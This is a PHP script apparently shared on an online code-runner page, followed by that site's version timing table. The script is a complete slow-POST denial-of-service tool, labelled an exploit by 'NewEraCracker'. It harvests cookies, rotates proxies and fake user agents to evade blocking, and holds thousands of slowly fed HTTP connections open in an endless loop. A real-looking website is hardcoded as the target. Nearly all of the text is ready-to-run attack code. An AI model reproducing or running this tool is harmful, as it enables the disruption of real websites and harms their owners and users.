@ 2013-05-02T20:23:47Z <?php
ignore_user_abort(true);
set_time_limit(0);
$_SERVER['argv'][1] = 'http://aeestesl.com/index.php?option=com_content&view=article&id=144&Itemid=70';
//-------------------------
// CONFiG
//-------------------------
$default_max_cookies = 100;
$default_max_sockets = 9001;
$default_msec_timeout = 500;
$default_usleep_time = 0;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if( !defined('EXPLOIT_VERSION') )
define( 'EXPLOIT_VERSION', 'v1.6.2' );
// Define STDIN
if( !defined('STDIN') )
define( 'STDIN', fopen('php://stdin','r') );
// Check SAPI
if(PHP_SAPI != 'cli')
{
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Globals - DO NOT EDIT
$global_proxy_array = null;
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/** Read STDIN and return it */
function readSTDIN()
{
$file = STDIN;
if(!$file) return false;
$data = fgets($file);
return rtrim($data);
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename)
{
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\','/',$filename);
$global_proxy_array = @file_get_contents($filename);
if(!$filename || !$global_proxy_array)
{
echo $filename.' is not a valid proxy-list file!';
exit(1);
}
$global_proxy_array = str_replace( array("\r\n","\r"), "\n", $global_proxy_array);
$global_proxy_array = explode("\n",$global_proxy_array);
// Grab the proxies
foreach($global_proxy_array as $key => $value)
{
$global_proxy_array[$key] = explode(':',$value);
if( isset($global_proxy_array[$key][0], $global_proxy_array[$key][1]) )
{
// This allows me to get proxies from lists like
// IP:PORT bla bla bla
$global_proxy_array[$key][1] = explode(' ',$global_proxy_array[$key][1]);
$global_proxy_array[$key][1] = explode("\t",$global_proxy_array[$key][1][0]);
$global_proxy_array[$key][1] = $global_proxy_array[$key][1][0];
// The proxy
$global_proxy_array[$key] = array('host' => $global_proxy_array[$key][0], 'port' => $global_proxy_array[$key][1]);
}
else
{
unset($global_proxy_array[$key]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom()
{
global $global_proxy_array;
// Give a random proxy
$proxy = null;
if( count($global_proxy_array) )
{
while( !$proxy )
{
$rand = mt_rand(0,count($global_proxy_array)-1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
return $proxy;
}
return false;
}
/** Returns a random useragent */
function randomUserAgent()
{
// Microsoft Windows versions
$os = array('5.0','5.1','5.2','6.0','6.1','6.2');
// Select a random windows
$os = $os [ mt_rand(0,count($os)-1) ];
// Select a random browser
if( mt_rand(0,1) )
{
// Internet Explorer versions
$ua[0] = array('4.0','7.0');
$ua[1] = array('4.0','8.0');
$ua[2] = array('5.0','9.0');
// Random IE
$ua = $ua [ mt_rand(0,count($ua)-1) ];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
}
else
{
// Mozilla Firefox versions
$ua = array('18.0','19.0','20.0');
// Random FF
$ua = $ua [ mt_rand(0,count($ua)-1) ];
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
}
}
/** Opens a custom socket and returns it */
function openCustomSocket($newEraUrl, $newEraProxy=null)
{
global $default_msec_timeout;
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port, $errno, $errstr, 1);
if (!$fp)
return false;
stream_set_blocking($fp,0);
stream_set_timeout($fp,0,$default_msec_timeout);
return $fp;
}
/**
* Receives a socket and performs the start of a slowPosting
* Returns Content-Length on success and false on failure
*/
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie)
{
// Check the socket
if($sock)
{
// Generate a random Content-Length
$length = mt_rand(1337,31337);
// Init
if($newEraProxy == null)
$out = 'POST /'.$newEraUrl->path.' HTTP/1.1'."\r\n";
else
$out = 'POST '.$newEraUrl->full_url.' HTTP/1.1'."\r\n";
// Build
$out .= 'Host: '.$newEraUrl->name."\r\n";
$out .= 'Connection: Keep-Alive'."\r\n";
$out .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$out .= 'User-Agent: '.randomUserAgent()."\r\n";
$out .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$out .= 'Accept-Encoding: gzip,deflate'."\r\n";
$out .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
$out .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$out .= mt_rand(0,1) ? 'Referer: '.($newEraUrl->ssl?'https://':'http://').$newEraUrl->name.'/'."\r\n" : '';
$out .= ($cookie ? "Cookie: {$cookie}\r\n" : '' );
$out .= 'Content-Length: '.$length."\r\n";
$out .= "\r\n";
// Do it
@fwrite($sock, $out);
return $length;
}
return false;
}
/** Receives a socket and continues the slowPosting */
function slowPostContinue($sock,$bytes=5)
{
global $default_usleep_time;
// Throttle execution speed slightly
if( $default_usleep_time > 0 )
@usleep($default_usleep_time);
// Check the $bytes
if( intval($bytes) != $bytes ) $bytes=5;
// Check the socket
if($sock)
{
// Do it :D
$out = '';
for($j=0;$j<$bytes;$j++);
{
$out .= chr(mt_rand(33,126));
}
$out = urlencode($out);
@fwrite($sock, $out);
return true;
}
else
return false;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies
{
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i=0; $i<$this->max_cookies; $i++)
{
// Using Proxy file?
if( $proxyFile )
{
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx)
{
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies-1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header)
{
$cookies = array();
foreach($header as $line)
{
if(preg_match('/^Set-Cookie: /i', $line))
{
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$has_grabbed_cookie_data = false;
foreach($csplit as $data)
{
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$has_grabbed_cookie_data)
{
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$has_grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires','path','secure','comment')))
{
$cdata[trim($cinfo[0])] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data)
{
if(is_array($data))
{
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy=null)
{
// Build connection headers
$headers = 'Connection: Keep-Alive'."\r\n";
$headers .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$headers .= 'User-Agent: '.randomUserAgent()."\r\n";
$headers .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$headers .= 'Accept-Encoding: gzip,deflate'."\r\n";
$headers .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
// Check proxy url
if($newEraProxy == null)
{
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
else
{
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
}
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $headers,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)
));
// Let the fun begin
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// I hope this does work
if($handle)
{
// If it worked, we grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// Fun is only at a small distance
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl
{
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($host_full_url)
{
$this->update_object($host_full_url);
}
/** Object updater */
public function update_object($host_full_url)
{
$this->host_full_url = $host_full_url;
$this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false);
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
// Grab other parameters
$host_full_url = explode('/',$host_full_url,4);
$host_full_url[2] = explode(':',$host_full_url[2],2);
// Host, Port, Path
$this->host_name = $host_full_url[2][0];
$this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = (isset($host_full_url[3]) ? $host_full_url[3] : '');
}
/** Getter for the private properties */
public function __get($var)
{
$var = 'host_'.$var;
if(property_exists($this,$var))
return $this->{$var};
}
/** Quick check to see if url is minimally valid */
public static function isValid($host_full_url)
{
if(strpos($host_full_url,'https://') === 0 || strpos($host_full_url,'http://') === 0)
return true;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy
{
private $proxy_full_url;
private $proxy_protocol;
private $proxy_ssl;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($proxy_full_url)
{
$this->update_object($proxy_full_url);
}
/** Object updater */
public function update_object($proxy_full_url)
{
$this->proxy_full_url = $proxy_full_url;
$this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false);
$this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp');
// Grab other parameters
if( false !== ($tmp = strpos($proxy_full_url,'://')) )
$proxy_full_url = substr($proxy_full_url, $tmp+3);
$proxy_full_url = explode(':',$proxy_full_url);
// Host, Port, Path
$this->proxy_name = $proxy_full_url[0];
$this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80'));
}
/** Getter for the private properties */
public function __get($var)
{
$var = 'proxy_'.$var;
if(property_exists($this,$var))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if( isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]) )
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if( !empty($url) && isset($_SERVER['argv'][2]) )
{
if( $proxy = explode(':',$_SERVER['argv'][2]) )
{
if( isset($proxy[0], $proxy[1]) )
{
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = $proxy[1];
unset($proxy[0], $proxy[1]);
}
}
if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
{
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
{
$proxy['use'] = null;
while( !$proxy['use'] )
{
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
if( strpos(strtolower($proxy['use']),'y') === 0 )
{
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = readSTDIN();
}
elseif( strpos(strtolower($proxy['use']),'n') === 0 )
{
break;
}
elseif( strpos(strtolower($proxy['use']),'f') === 0 )
{
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if( is_readable($proxy['filename']) )
{
$proxy['file'] = true;
}
else
{
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
}
else
{
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
while( !$url )
{
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if( NewEraUrl::isValid($url) ) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy suport
if( empty($proxy['host']) || empty($proxy['port']) )
{
$newEraProxy = null;
if( !empty($proxy['file']) )
{
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
}
else
{
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
@ini_set('default_socket_timeout',1);
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
// Do it
while(true)
{
$fp = array();
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
for($i=0;$i<$default_max_sockets;$i++)
{
// Using Proxy file?
if( $proxy['file'] )
{
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket (only try to open SSL sockets if not using proxies)
if( $fp[$i]['sock'] = openCustomSocket($newEraUrl, $newEraProxy) )
{
// Progress bar?
echo '+';
// Start a new slowPost
if( $_length = slowPostStart($fp[$i]['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random') ) )
{
// Find the lenght
if( !isset($fp[$i]['length']) )
{
$fp[$i]['length'] = $_length;
}
}
else
{
// Epic fail?
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
}
else
{
// Epic fail?
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Check the current sockets
foreach($fp as $_k => $_v)
{
if($fp[$_k]['length'] > 0)
{
// Contine old slowPosts
$_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5;
slowPostContinue($fp[$_k]['sock'],$_length);
$fp[$_k]['length'] = $fp[$_k]['length']-$_length;
}
else
{
// Close completed slowPosts
@fclose($fp[$_k]['sock']);
unset($fp[$_k]);
}
}
unset($_k,$_v);
}
// Restart
foreach($fp as $_k => $_v)
{
@fclose($fp[$_k]['sock']);
}
$newEraCookies->update_object($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
}
?>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 8.3.7 0.010 0.013 18.66 8.3.6 0.017 0.014 19.02 8.3.5 0.013 0.010 22.24 8.3.4 0.016 0.003 19.64 8.3.3 0.011 0.006 19.49 8.3.2 0.010 0.000 20.79 8.3.1 0.003 0.007 22.34 8.3.0 0.000 0.009 22.70 8.2.18 0.012 0.006 17.38 8.2.17 0.018 0.000 22.96 8.2.16 0.019 0.003 19.58 8.2.15 0.003 0.006 24.18 8.2.14 0.003 0.006 24.66 8.2.13 0.013 0.009 26.16 8.2.12 0.010 0.000 19.79 8.2.11 0.006 0.006 19.82 8.2.10 0.007 0.007 18.13 8.2.9 0.000 0.010 19.70 8.2.8 0.006 0.003 18.13 8.2.7 0.000 0.013 18.13 8.2.6 0.010 0.000 18.54 8.2.5 0.003 0.008 18.07 8.2.4 0.005 0.005 18.72 8.2.3 0.006 0.003 18.58 8.2.2 0.006 0.003 18.24 8.2.1 0.003 0.006 18.17 8.2.0 0.003 0.009 18.24 8.1.28 0.016 0.010 25.92 8.1.27 0.007 0.003 20.56 8.1.26 0.000 0.009 26.35 8.1.25 0.004 0.004 28.09 8.1.24 0.007 0.003 22.57 8.1.23 0.007 0.007 20.90 8.1.22 0.003 0.006 18.05 8.1.21 0.003 0.007 18.77 8.1.20 0.000 0.012 17.85 8.1.19 0.007 0.003 18.03 8.1.18 0.000 0.009 19.18 8.1.17 0.006 0.003 18.97 8.1.16 0.003 0.007 22.59 8.1.15 0.003 0.006 18.98 8.1.14 0.005 0.005 17.90 8.1.13 0.004 0.004 18.30 8.1.12 0.003 0.006 17.98 8.1.11 0.003 0.006 17.80 8.1.10 0.003 0.006 17.81 8.1.9 0.009 0.000 17.80 8.1.8 0.003 0.006 17.88 8.1.7 0.006 0.003 17.89 8.1.6 0.007 0.007 17.97 8.1.5 0.006 0.003 18.03 8.1.4 0.005 0.005 17.90 8.1.3 0.003 0.006 17.98 8.1.2 0.000 0.011 17.93 8.1.1 0.000 0.009 17.98 8.1.0 0.003 0.006 18.03 8.0.30 0.003 0.007 18.77 8.0.29 0.006 0.003 17.13 8.0.28 0.006 0.003 18.96 8.0.27 0.008 0.003 17.76 8.0.26 0.006 0.003 17.43 8.0.25 0.003 0.006 17.54 8.0.24 0.003 0.007 17.33 8.0.23 0.003 0.006 17.54 8.0.22 0.003 0.006 17.26 8.0.21 0.006 0.003 17.39 8.0.20 0.000 0.008 17.44 8.0.19 0.007 0.003 17.48 8.0.18 0.005 0.005 17.38 8.0.17 0.003 0.007 17.35 8.0.16 0.006 0.003 17.36 8.0.15 0.000 0.009 17.34 8.0.14 0.003 0.008 17.48 8.0.13 0.008 0.000 13.91 8.0.12 0.012 0.003 17.48 8.0.11 0.007 0.007 17.57 8.0.10 0.007 0.007 17.48 8.0.9 0.006 0.006 17.39 8.0.8 0.019 0.012 17.41 8.0.7 0.007 0.007 17.44 8.0.6 0.007 0.007 17.55 8.0.5 0.009 0.006 17.50 8.0.3 0.024 0.016 17.48 8.0.2 0.034 0.014 17.61 8.0.1 0.010 0.003 17.57 8.0.0 0.029 0.017 17.26 7.4.33 0.629 1.372 15.00 7.4.32 0.577 1.427 16.98 7.4.30 0.599 1.402 16.77 7.4.29 0.526 1.474 16.75 7.4.28 0.639 1.362 16.94 7.4.27 0.503 1.499 16.75 7.4.26 0.470 1.535 16.84 7.4.25 1.488 0.435 16.81 7.4.24 1.481 0.469 16.97 7.4.23 1.495 0.463 16.97 7.4.22 1.357 0.583 16.91 7.4.21 1.345 0.602 16.94 7.4.20 1.452 0.492 17.04 7.4.19 1.473 0.460 17.08 7.4.16 1.468 0.488 16.78 7.4.15 1.489 0.473 17.40 7.4.14 1.486 0.460 17.86 7.4.13 1.465 0.495 17.08 7.4.12 1.424 0.533 16.96 7.4.11 1.519 0.521 17.04 7.4.10 1.418 0.510 16.88 7.4.9 1.504 0.550 17.03 7.4.8 1.454 0.550 19.39 7.4.7 1.419 0.575 16.96 7.4.6 1.466 0.536 17.00 7.4.5 1.432 0.508 16.82 7.4.4 1.455 0.596 22.77 7.4.3 1.453 0.539 17.02 7.4.0 1.567 0.426 15.32 7.3.33 0.556 1.446 13.78 7.3.32 0.536 1.465 13.92 7.3.31 1.428 0.510 16.96 7.3.30 1.483 0.459 16.86 7.3.29 1.332 0.608 16.89 7.3.28 1.326 0.604 16.83 7.3.27 1.440 0.497 17.40 7.3.26 1.412 0.540 16.82 7.3.25 1.463 0.490 16.94 7.3.24 1.222 0.412 17.02 7.3.23 1.464 0.501 16.85 7.3.21 1.413 0.609 16.73 7.3.20 1.445 0.470 19.39 7.3.19 1.369 0.619 16.77 7.3.18 1.250 0.575 16.80 7.3.17 1.379 0.639 16.81 7.3.16 1.423 0.583 16.88 7.3.12 1.497 0.497 15.51 7.2.33 1.492 0.558 17.05 7.2.32 1.369 0.568 17.11 7.2.31 1.375 0.606 16.96 7.2.30 1.365 0.649 17.21 7.2.29 1.433 0.576 16.96 7.1.10 1.936 0.516 18.05 7.1.7 0.000 0.009 17.43 7.1.6 0.009 0.004 17.78 7.1.5 0.013 0.013 17.50 7.0.20 0.004 0.007 17.14
preferences:dark mode live preview
46.39 ms | 401 KiB | 5 Q